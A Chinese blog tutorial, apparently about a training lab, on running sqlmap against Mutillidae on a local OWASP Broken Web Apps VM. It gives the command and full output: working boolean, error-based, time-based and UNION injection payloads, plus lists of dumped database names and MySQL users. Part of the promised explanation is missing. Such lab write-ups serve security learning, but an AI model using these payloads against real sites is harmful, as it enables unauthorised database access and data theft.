SQLmap 自动注入 -02

shenghuiping20012025-01-22 14:18

1: 如果想获得SQL 数据库的信息,可以加入参数: -dbs

sqlmap -u "http://192.168.56.133/mutillidae/index.php?page=user-info.php&username=xiaosheng&password=abc&user-info-php-submit-button=View+Account+Details" --batch -p username -dbs

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 06:07:47 /2025-01-21/

[06:07:47] [INFO] resuming back-end DBMS 'mysql'

[06:07:47] [INFO] testing connection to the target URL

you have not declared cookie(s), while server wants to set its own ('PHPSESSID=vpgtsrbl91e...40rho4rej4;showhints=1'). Do you want to use those [Y/n] Y

sqlmap resumed the following injection point(s) from stored session:

Parameter: username (GET)

Type: boolean-based blind

Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)

Payload: page=user-info.php&username=-4134' OR 5736=5736#&password=abc&user-info-php-submit-button=View Account Details

Type: error-based

Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)

Payload: page=user-info.php&username=xiaosheng' AND (SELECT 6106 FROM(SELECT COUNT(*),CONCAT(0x717a627a71,(SELECT (ELT(6106=6106,1))),0x716b7a7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- uiLS&password=abc&user-info-php-submit-button=View Account Details

Type: time-based blind

Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)

Payload: page=user-info.php&username=xiaosheng' AND (SELECT 4704 FROM (SELECT(SLEEP(5)))pmhr)-- ITco&password=abc&user-info-php-submit-button=View Account Details

Type: UNION query

Title: MySQL UNION query (NULL) - 7 columns

Payload: page=user-info.php&username=xiaosheng' UNION ALL SELECT NULL,CONCAT(0x717a627a71,0x4e564f5771416964435a7375556e7944795359717172507a7953457451746c5a5a61436565456677,0x716b7a7871),NULL,NULL,NULL,NULL,NULL#&password=abc&user-info-php-submit-button=View Account Details

[06:07:48] [INFO] the back-end DBMS is MySQL

web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)

web application technology: PHP, PHP 5.3.2, Apache 2.2.14

back-end DBMS: MySQL >= 5.0

[06:07:48] [INFO] fetching database names

[06:07:50] [WARNING] reflective value(s) found and filtering out

available databases [34]:

[*] .svn

[*] bricks

[*] bwapp

[*] citizens

[*] cryptomg

[*] dvwa

[*] gallery2

[*] getboo

[*] ghost

[*] gtd-php

[*] hex

[*] information_schema

[*] isp

[*] joomla

[*] mutillidae

[*] mysql

[*] nowasp

[*] orangehrm

[*] personalblog

[*] peruggia

[*] phpbb

[*] phpmyadmin

[*] proxy

[*] rentnet

[*] sqlol

[*] tikiwiki

[*] vicnum

[*] wackopicko

[*] wavsepdb

[*] webcal

[*] webgoat_coins

[*] wordpress

[*] wraithlogin

[*] yazd

[06:07:52] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.56.133'

[06:07:52] [WARNING] your sqlmap version is outdated

[*] ending @ 06:07:52 /2025-01-21/

下面列一下参数的作用:

下面看一下执行结果:

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 06:11:28 /2025-01-21/

[06:11:29] [INFO] resuming back-end DBMS 'mysql'

[06:11:29] [INFO] testing connection to the target URL

you have not declared cookie(s), while server wants to set its own ('PHPSESSID=jfganof3ik5...ukdpgiq063;showhints=1'). Do you want to use those [Y/n] Y

sqlmap resumed the following injection point(s) from stored session:

Parameter: username (GET)

Type: boolean-based blind

Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)

Payload: page=user-info.php&username=-4134' OR 5736=5736#&password=abc&user-info-php-submit-button=View Account Details

Type: error-based

Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)

Payload: page=user-info.php&username=xiaosheng' AND (SELECT 6106 FROM(SELECT COUNT(*),CONCAT(0x717a627a71,(SELECT (ELT(6106=6106,1))),0x716b7a7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- uiLS&password=abc&user-info-php-submit-button=View Account Details

Type: time-based blind

Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)

Payload: page=user-info.php&username=xiaosheng' AND (SELECT 4704 FROM (SELECT(SLEEP(5)))pmhr)-- ITco&password=abc&user-info-php-submit-button=View Account Details

Type: UNION query

Title: MySQL UNION query (NULL) - 7 columns

Payload: page=user-info.php&username=xiaosheng' UNION ALL SELECT NULL,CONCAT(0x717a627a71,0x4e564f5771416964435a7375556e7944795359717172507a7953457451746c5a5a61436565456677,0x716b7a7871),NULL,NULL,NULL,NULL,NULL#&password=abc&user-info-php-submit-button=View Account Details

[06:11:30] [INFO] the back-end DBMS is MySQL

web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)

web application technology: Apache 2.2.14, PHP 5.3.2, PHP

back-end DBMS: MySQL >= 5.0

[06:11:30] [INFO] fetching database users

[06:11:32] [WARNING] reflective value(s) found and filtering out

database management system users [38]:

[*] 'bricks'@'%'

[*] 'bwapp'@'%'

[*] 'citizens'@'localhost'

[*] 'cryptomg'@'%'

[*] 'debian-sys-maint'@'localhost'

[*] 'dvwa'@'%'

[*] 'gallery2'@'localhost'

[*] 'getboo'@'%'

[*] 'ghost'@'%'

[*] 'gtd-php'@'%'

[*] 'hex'@'localhost'

[*] 'joomla'@'localhost'

[*] 'jotto'@'%'

[*] 'kbloom'@'localhost'

[*] 'mutillidae'@'%'

[*] 'orangehrm'@'%'

[*] 'personalblog'@'%'

[*] 'peruggia'@'%'

[*] 'phpbb'@'%'

[*] 'phpmyadmin'@'localhost'

[*] 'root'@'127.0.0.1'

[*] 'root'@'brokenwebapps'

[*] 'root'@'localhost'

[*] 'sendmail'@'localhost'

[*] 'sqlol'@'%'

[*] 'stealth'@'localhost'

[*] 'tikiwiki'@'localhost'

[*] 'undertaker'@'localhost'

[*] 'vicnum'@'localhost'

[*] 'wackopicko'@'%'

[*] 'wavsep'@'localhost'

[*] 'webcal'@'localhost'

[*] 'webgoat.net'@'%'

[*] 'webmaster'@'localhost'

[*] 'wordpress'@'%'

[*] 'wraith'@'localhost'

[*] 'yazd'@'%'

[*] 'yazd10'@'%'

[06:11:34] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.56.133'

[06:11:34] [WARNING] your sqlmap version is outdated

[*] ending @ 06:11:34 /2025-01-21/

可以看出上面是所有用户的结果,如果看当前用户,那么如下结果:

[06:19:04] [INFO] the back-end DBMS is MySQL

web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)

web application technology: PHP, PHP 5.3.2, Apache 2.2.14

back-end DBMS: MySQL >= 5.0

[06:19:04] [INFO] fetching current user

[06:19:06] [WARNING] reflective value(s) found and filtering out

current user: 'mutillidae@%'

[06:19:06] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.56.133'

[06:19:06] [WARNING] your sqlmap version is outdated

[*] ending @ 06:19:06 /2025-01-21/

参考文献: 16.SQL注入攻击_哔哩哔哩_bilibili

相关推荐
{⌐■_■}44 分钟前
【GORM】事务,嵌套事务,保存点事务的使用,简单电商平台go案例
开发语言·jvm·后端·mysql·golang
暮湫1 小时前
MySQL(4)多表查询
数据库·mysql
m0_748252382 小时前
三分钟内快速完成MySQL到达梦数据库的迁移
数据库·mysql
m0_748255652 小时前
MySQL篇之对MySQL进行参数优化,提高MySQL性能
数据库·mysql
m0_748256565 小时前
MySQL 实战 4 种将数据同步到ES方案
数据库·mysql·elasticsearch
蚂蚁质量5 小时前
mysql的测试方案
数据库·mysql
FHYAAAX6 小时前
Flask简介与安装以及实现一个糕点店的简单流程
python·mysql·flask
doubt。7 小时前
【BUUCTF】BUU XSS COURSE 11
笔记·学习·安全·web安全·网络安全·web·xss
S-X-S8 小时前
「2024 博客之星」自研Java框架 Sunrays-Framework 使用教程
java·rabbitmq·springboot·web·log4j2·minio·脚手架
热门推荐
01Windows10安装PCL1.14.0及点云配准02(欧拉)openEuler系统添加网卡文件配置流程、(欧拉)openEuler系统手动配置ipv6地址流程、(欧拉)openEuler系统网络管理说明03半导体应用系统一些小知识收集(strip&wafer mapping,EAP&scada)04Dell服务器升级ubuntu 22.04失败解决05密码学原理技术-第六章-introduction to pulibc-key cryptography06优化手机性能,解决卡顿问题:关闭这3个微信开关,释放内存空间07leetcode - 1769. Minimum Number of Operations to Move All Balls to Each Box08centos7 init.d 和system.d09渗透测试之SQLMAP工具详解 kali自带SQLmap解释 重点sqlmap --tamper 使用方式详解 搞完你就很nice了10小米路由器简单救砖